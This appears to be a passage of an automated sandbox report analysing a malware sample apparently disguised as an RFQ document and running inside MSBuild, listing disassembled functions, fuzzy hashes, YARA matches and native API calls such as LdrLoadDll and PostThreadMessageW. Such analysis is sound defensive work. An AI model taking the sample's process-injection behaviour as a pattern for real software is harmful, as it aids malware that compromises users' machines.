                                                                                                              • Instruction Fuzzy Hash: F3413DB0E0521ADBDB08CFA9C4816AEFBF2EF88300F24D46AC409F7214D7349A518F95
                                                                                                              Function 07314F00 Relevance: .1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09f91733d17d09c026a416c531f4d4307e97100544ee9ed1be30e9337d392cec
                                                                                                              • Instruction ID: edb306eea8e643ba957f43f8bd4b041774e00ece600dd5dc4df25c452824db07
                                                                                                              • Opcode Fuzzy Hash: 09f91733d17d09c026a416c531f4d4307e97100544ee9ed1be30e9337d392cec
                                                                                                              • Instruction Fuzzy Hash: 0D4109B1E1524ADBDB48CFAAD4815AEFBF2EF89300F14C46AD419A7344E7349A41CF94
                                                                                                              Function 07318358 Relevance: .1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 63e5e0a7f66ec0e0ae405e2e91f6ee6d16a804ab33170affeb4e28445096027a
                                                                                                              • Instruction ID: 0020e193520456fe3eb887afb6312efa9c4030dd0bac54d5bcabccf46b4cad34
                                                                                                              • Opcode Fuzzy Hash: 63e5e0a7f66ec0e0ae405e2e91f6ee6d16a804ab33170affeb4e28445096027a
                                                                                                              • Instruction Fuzzy Hash: BC415EB4E1520ADFDF08CFA5C5416AEFBF5EB89310F24986AC108B7264D77497028B98
                                                                                                              Function 07314F10 Relevance: .1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fe5b1c00e560334d03c52a4f15c299514fd22b37e3e57727375506c1d450f9e4
                                                                                                              • Instruction ID: a4b377da4e6212e4ad0346e882366660d8a5bba9394deffbcecf9db01bdf1199
                                                                                                              • Opcode Fuzzy Hash: fe5b1c00e560334d03c52a4f15c299514fd22b37e3e57727375506c1d450f9e4
                                                                                                              • Instruction Fuzzy Hash: C041D3B0E1520ADBDB48CFAAD4815EEFBF6AF89300F14C46AD419A7254E7349A418F94
                                                                                                              Function 0731001B Relevance: .1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a988f86c9c1bd9032ba61537433dacd170afa549b970f916370865a895316f37
                                                                                                              • Instruction ID: e749b950b80a837ea2f7f69b3e876e5d7cc20628b1976b7cd52d94de7fe90715
                                                                                                              • Opcode Fuzzy Hash: a988f86c9c1bd9032ba61537433dacd170afa549b970f916370865a895316f37
                                                                                                              • Instruction Fuzzy Hash: F821E9B1E056198FEB1CCF6BD84169EBBF3AFC9200F18C0B6D818A6265DB3405468F51
                                                                                                              Function 07310040 Relevance: .1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7ef44730db1e2484cba10daa3af74695f70eb608e5e5a36124dac3dcd1e362f3
                                                                                                              • Instruction ID: b06ff8badc0ccee47a4d6e3bc3b049db23917d93c81ab43cc7228ac51880e6ae
                                                                                                              • Opcode Fuzzy Hash: 7ef44730db1e2484cba10daa3af74695f70eb608e5e5a36124dac3dcd1e362f3
                                                                                                              • Instruction Fuzzy Hash: 611199B1E006189BEB5CCFABD84069EFBF7AFC8200F14C17AD91CA6254EB7406568F55

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.1%
                                                                                                              Dynamic/Decrypted Code Coverage:5.1%
                                                                                                              Signature Coverage:9.5%
                                                                                                              Total number of Nodes:137
                                                                                                              Total number of Limit Nodes:8
                                                                                                              execution_graph 94180 401a30 94181 4019ff 94180->94181 94184 42feb3 94181->94184 94182 401b40 94182->94182 94187 42e4f3 94184->94187 94188 42e519 94187->94188 94199 4074e3 94188->94199 94190 42e52f 94198 42e58b 94190->94198 94202 41b193 94190->94202 94192 42e54e 94193 42e563 94192->94193 94217 42cc23 94192->94217 94213 428373 94193->94213 94196 42e57d 94197 42cc23 ExitProcess 94196->94197 94197->94198 94198->94182 94220 4164e3 94199->94220 94201 4074f0 94201->94190 94203 41b1bf 94202->94203 94231 41b083 94203->94231 94206 41b204 94209 41b220 94206->94209 94211 42c843 NtClose 94206->94211 94207 41b1ec 94208 41b1f7 94207->94208 94210 42c843 NtClose 94207->94210 94208->94192 94209->94192 94210->94208 94212 41b216 94211->94212 94212->94192 94214 4283d4 94213->94214 94216 4283e1 94214->94216 94242 4186b3 94214->94242 94216->94196 94218 42cc40 94217->94218 94219 42cc51 ExitProcess 94218->94219 94219->94193 94221 4164fd 94220->94221 94223 416513 94221->94223 94224 42d2c3 94221->94224 94223->94201 94226 42d2dd 94224->94226 94225 42d30c 94225->94223 94226->94225 94227 42be33 LdrInitializeThunk 94226->94227 94228 42d36c 94227->94228 94229 42e943 RtlFreeHeap 94228->94229 94230 42d385 94229->94230 94230->94223 94232 41b09d 94231->94232 94236 41b179 94231->94236 94237 42bed3 94232->94237 94235 42c843 NtClose 94235->94236 94236->94206 94236->94207 94238 42bef0 94237->94238 94241 11535c0 LdrInitializeThunk 94238->94241 94239 41b16d 94239->94235 94241->94239 94243 4186dd 94242->94243 94249 418beb 94243->94249 94250 413cf3 94243->94250 94245 41880a 94246 42e943 RtlFreeHeap 94245->94246 94245->94249 94247 418822 94246->94247 94248 42cc23 ExitProcess 94247->94248 94247->94249 94248->94249 94249->94216 94254 413d13 94250->94254 94252 413d7c 94252->94245 94253 413d72 94253->94245 94254->94252 94255 41b4a3 RtlFreeHeap LdrInitializeThunk 94254->94255 94255->94253 94107 424e43 94111 424e5c 94107->94111 94108 424ea4 94115 42e943 94108->94115 94111->94108 94112 424ee1 94111->94112 94114 424ee6 94111->94114 94113 42e943 RtlFreeHeap 94112->94113 94113->94114 94118 42cbd3 94115->94118 94117 424eb1 94119 42cbf0 94118->94119 94120 42cc01 RtlFreeHeap 94119->94120 94120->94117 94121 42f9e3 94122 42f9f3 94121->94122 94123 42f9f9 94121->94123 94126 42ea23 94123->94126 94125 42fa1f 94129 42cb83 94126->94129 94128 42ea3b 94128->94125 94130 42cba0 94129->94130 94131 42cbb1 RtlAllocateHeap 94130->94131 94131->94128 94132 42bde3 94133 42be00 94132->94133 94136 1152df0 LdrInitializeThunk 94133->94136 94134 42be28 94136->94134 94256 424ab3 94257 424acf 94256->94257 94258 424af7 94257->94258 94259 424b0b 94257->94259 94261 42c843 NtClose 94258->94261 94260 42c843 NtClose 94259->94260 94263 424b14 94260->94263 94262 424b00 94261->94262 94266 42ea63 RtlAllocateHeap 94263->94266 94265 424b1f 94266->94265 94137 41b383 94138 41b3c7 94137->94138 94139 41b3e8 94138->94139 94141 42c843 94138->94141 94142 42c860 94141->94142 94143 42c871 NtClose 94142->94143 94143->94139 94144 414083 94145 414090 94144->94145 94150 417833 94145->94150 94147 4140bb 94148 414100 94147->94148 94149 4140ef PostThreadMessageW 94147->94149 94149->94148 94153 417857 94150->94153 94151 41785e 94151->94147 94152 41787d 94155 417893 LdrLoadDll 94152->94155 94156 4178aa 94152->94156 94153->94151 94153->94152 94157 42fdc3 LdrLoadDll 94153->94157 94155->94156 94156->94147 94157->94152 94158 41e583 94159 41e5a9 94158->94159 94163 41e69d 94159->94163 94164 42fb13 94159->94164 94161 41e63e 94161->94163 94170 42be33 94161->94170 94165 42fa83 94164->94165 94166 42fae0 94165->94166 94167 42ea23 RtlAllocateHeap 94165->94167 94166->94161 94168 42fabd 94167->94168 94169 42e943 RtlFreeHeap 94168->94169 94169->94166 94171 42be4d 94170->94171 94174 1152c0a 94171->94174 94172 42be79 94172->94163 94175 1152c11 94174->94175 94176 1152c1f LdrInitializeThunk 94174->94176 94175->94172 94176->94172 94267 413b13 94268 413b2f 94267->94268 94271 42cae3 94268->94271 94272 42cafd 94271->94272 94275 1152c70 LdrInitializeThunk 94272->94275 94273 413b35 94275->94273 94276 1152b60 LdrInitializeThunk 94177 418e08 94178 42c843 NtClose 94177->94178 94179 418e12 94178->94179

                                                                                                              Executed Functions

                                                                                                              Function 00417833 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 131 417833-41784f 132 417857-41785c 131->132 133 417852 call 42f523 131->133 134 417862-417870 call 42fb23 132->134 135 41785e-417861 132->135 133->132 138 417880-417891 call 42dfc3 134->138 139 417872-41787d call 42fdc3 134->139 145 417893-4178a7 LdrLoadDll 138->145 146 4178aa-4178ad 138->146 139->138 145->146
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: f830006e6615140e8580b637796e91e8ab5f34b2beb2de568595537b0918178b
                                                                                                              • Instruction ID: ecafafc67528ff2c0a8c38e8f30d75d0d6e8b2cf75cf3923b583574fb7cade4a
                                                                                                              • Opcode Fuzzy Hash: f830006e6615140e8580b637796e91e8ab5f34b2beb2de568595537b0918178b
                                                                                                              • Instruction Fuzzy Hash: EF0140B1E00109B7DB10EAE1DC46FDEB3789F54308F4041A6E90897240F635EB58C755
                                                                                                              Function 0042C843 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 171 42c843-42c87f call 404883 call 42dac3 NtClose
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C87A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                                                                              • Instruction ID: 367e2f773cb965f5ce42092994158f42d79d17829f4288edd670b8861a2249ed
                                                                                                              • Opcode Fuzzy Hash: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                                                                              • Instruction Fuzzy Hash: 1AE04F366402147BD520EB5ADC42F9B779CDFC5760F408529FA08A7241CA71B9008BA4
                                                                                                              Function 01152B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 185 1152b60-1152b6c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: bc70912eddb58c8ec84e8832b1057632a99781501895dcd1638683b48423bff5
                                                                                                              • Instruction ID: 5b6eaa4235d127a0a004f47779db97b8bc6393253d11205d267b302e4d095d97
                                                                                                              • Opcode Fuzzy Hash: bc70912eddb58c8ec84e8832b1057632a99781501895dcd1638683b48423bff5
                                                                                                              • Instruction Fuzzy Hash: 179002A12025000341097158451461A400E97E0201B55C021E5015590DC62689A16225
                                                                                                              Function 01152DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: fcf7fdaa2ef7cd45eb9f741595c69ce5b49850ff75971f28490d6d02361d887f
                                                                                                              • Instruction ID: 945bb15a9e74c9176f322739e3747e474a684fee1a2fe0f937942d665f812b3b
                                                                                                              • Opcode Fuzzy Hash: fcf7fdaa2ef7cd45eb9f741595c69ce5b49850ff75971f28490d6d02361d887f
                                                                                                              • Instruction Fuzzy Hash: 2D90027120150413D1157158460470B000D97D0241F95C412A4425558DD7578A62A221
                                                                                                              Function 01152C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: ac120ae0c5d8c836ca76579bdafcad31fb2f74cc5a9eca7aab3815da021f9923
                                                                                                              • Instruction ID: f3bcd175eb350b559f734e37e3c7565396fb1128024c07278c9b7f29d6374982
                                                                                                              • Opcode Fuzzy Hash: ac120ae0c5d8c836ca76579bdafcad31fb2f74cc5a9eca7aab3815da021f9923
                                                                                                              • Instruction Fuzzy Hash: 5990027120158802D1147158850474E000997D0301F59C411A8425658DC79689A17221
                                                                                                              Function 011535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 28d3ee007b3dc78f8da78f8421c904dbc3b9e89cdaac4ae98e2d6c8542492bdb
                                                                                                              • Instruction ID: 0ea91a6d57d86fa95667d3bf1f04059187b436ef6871522357c81edc32e0da84
                                                                                                              • Opcode Fuzzy Hash: 28d3ee007b3dc78f8da78f8421c904dbc3b9e89cdaac4ae98e2d6c8542492bdb
                                                                                                              • Instruction Fuzzy Hash: 3D90027160560402D1047158461470A100997D0201F65C411A4425568DC7968A6166A2
                                                                                                              Function 0041400C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004140FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 1836367815-2814820216
                                                                                                              • Opcode ID: 5deaff572d0f5190d5fcf7c7a8d7add8a85d85076e62a73e8884596ca0f35128
                                                                                                              • Instruction ID: 8964f30d0ad93d8657fde06eb3f9f7b59b907bf4b03a41c1f31d7013d8072a87
                                                                                                              • Opcode Fuzzy Hash: 5deaff572d0f5190d5fcf7c7a8d7add8a85d85076e62a73e8884596ca0f35128
                                                                                                              • Instruction Fuzzy Hash: AA21AC72E041057AD720BBA9DC41EEFBB78EF85358F24806EFA04A7201D62D4D0387D4
                                                                                                              Function 00413FCC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 0-2814820216
                                                                                                              • Opcode ID: 20bc7cafbaeb1015a9a1d73b68b2eab2612c3cefdf3a28a6ffa89f637762eec3
                                                                                                              • Instruction ID: 8e92d5b971038cc737c250f2bb71b05534d94f44fe295e91c63f42aea48a0353
                                                                                                              • Opcode Fuzzy Hash: 20bc7cafbaeb1015a9a1d73b68b2eab2612c3cefdf3a28a6ffa89f637762eec3
                                                                                                              • Instruction Fuzzy Hash: 79212EB2F441187ADB10DAD5AC81DEF77BCEF85354B45416AFB08F7201D1285D428BA4
                                                                                                              Function 00414077 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004140FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 1836367815-2814820216
                                                                                                              • Opcode ID: acf6c40fb78e07b1d2841ef5552d34e5e95fe5b18e49d67504bdff009d2bb76e
                                                                                                              • Instruction ID: 47bcbf16f948bd2efa43fc2af02dc92d76913aba3bbe8767e293d2df0de71043
                                                                                                              • Opcode Fuzzy Hash: acf6c40fb78e07b1d2841ef5552d34e5e95fe5b18e49d67504bdff009d2bb76e
                                                                                                              • Instruction Fuzzy Hash: 7B11C272D4416C7EEB10AAE59C82DEF7B7CDF81398F44806AFA14A7240D56D4E06CBA4
                                                                                                              Function 00414083 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004140FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 1836367815-2814820216
                                                                                                              • Opcode ID: 08fca1a0e1a0890d9208d996c0b528439d3dea7f914bf1ea09c325234879e7a1
                                                                                                              • Instruction ID: a796e303c3bda95c4014b7b5ddda5c90956674b21223f1a9010352b1be183124
                                                                                                              • Opcode Fuzzy Hash: 08fca1a0e1a0890d9208d996c0b528439d3dea7f914bf1ea09c325234879e7a1
                                                                                                              • Instruction Fuzzy Hash: 9301C4B2D0011C7ADB10AAE59C82DEF7B7CEF41398F45806AFA04A7241D6684E068BA5
                                                                                                              Function 0042CBD3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 77 42cbd3-42cc17 call 404883 call 42dac3 RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CC12
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID: neA
                                                                                                              • API String ID: 3298025750-2757349852
                                                                                                              • Opcode ID: 6b7aaf6b10fa7884de83b95025984858c049f17bc640bafaf4448f72ac6a3306
                                                                                                              • Instruction ID: 9b298db65f8c6bf01d9dcfbfa9e7aa2d063570d1b727d24a4cf7208db5536a0f
                                                                                                              • Opcode Fuzzy Hash: 6b7aaf6b10fa7884de83b95025984858c049f17bc640bafaf4448f72ac6a3306
                                                                                                              • Instruction Fuzzy Hash: 74E06D722042147BC614EE99DC41EAB73ACEFC8714F408419FD08A7241DA70B9108BB8
                                                                                                              Function 004178B3 Relevance: 1.6, APIs: 1, Instructions: 107libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 100 4178b3-4178bc 101 417912 100->101 102 4178be-4178d1 100->102 105 417915-41791f 101->105 106 4178a9 101->106 103 4178d3-4178d9 102->103 104 417878-417891 call 42fdc3 call 42dfc3 102->104 107 417920-417922 103->107 108 4178db 103->108 110 4178aa-4178ad 104->110 124 417893-4178a7 LdrLoadDll 104->124 105->107 106->110 111 417994-41799e 107->111 112 417924-417991 107->112 108->108 114 4179a0-4179a3 111->114 115 4179a4-4179bb call 42f583 111->115 122 4179bd-4179ee call 42f583 call 42b7d3 115->122 123 4179ef-417a0f call 42b7d3 115->123 124->110
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 0b6af81593f53b888134122441e15da9a80b41db1191adf4905be041ef5e5225
                                                                                                              • Instruction ID: 5d0be4d48f966b01517bdc42c4ba4bf6190df274e0818f87784c8df01efb4060
                                                                                                              • Opcode Fuzzy Hash: 0b6af81593f53b888134122441e15da9a80b41db1191adf4905be041ef5e5225
                                                                                                              • Instruction Fuzzy Hash: 613102B5A14209ABEB10EAA8DC42FEA7378EF44304F4445AEF908D7241F635DA5487D9
                                                                                                              Function 00417826 Relevance: 1.5, APIs: 1, Instructions: 29libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 147 417826-41782b 148 417839-41785c call 42f523 147->148 149 41782e 147->149 154 417862-417870 call 42fb23 148->154 155 41785e-417861 148->155 149->148 150 417895-4178a7 LdrLoadDll 149->150 152 4178aa-4178ad 150->152 158 417880-417891 call 42dfc3 154->158 159 417872-41787d call 42fdc3 154->159 158->152 165 417893-4178a7 LdrLoadDll 158->165 159->158 165->152
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: b45236e0de41b2749b61420101eba8697db62a92501e24b2d435ca03036e404e
                                                                                                              • Instruction ID: 3d823885dfb3bbc95cfc5e771c8059f83c63ec5343fb45df586f3dcac04713c6
                                                                                                              • Opcode Fuzzy Hash: b45236e0de41b2749b61420101eba8697db62a92501e24b2d435ca03036e404e
                                                                                                              • Instruction Fuzzy Hash: E8E05530D0C18977CB10DAB459091D8FBB0CF52208F0046EFD89C57143E1344958C342
                                                                                                              Function 0042CB83 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 166 42cb83-42cbc7 call 404883 call 42dac3 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041E63E,?,?,00000000,?,0041E63E,?,?,?), ref: 0042CBC2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                                                                              • Instruction ID: 477c5da0d8b10c1a74d97be33d87d72f42d7e0c6ee917c77eecc1667abc34b4e
                                                                                                              • Opcode Fuzzy Hash: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                                                                              • Instruction Fuzzy Hash: D6E06DB22042187BD614EF59EC41EEB33ADEFC5710F404419FD08A7242CA70B9118BB9
                                                                                                              Function 0042CC23 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 176 42cc23-42cc5f call 404883 call 42dac3 ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,41319B85,?,?,41319B85), ref: 0042CC5A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0
                                                                                                              • Opcode ID: 41715c15822ad2d6df214d347bab8e0ea5d94cc086f80d85ed167616973f667e
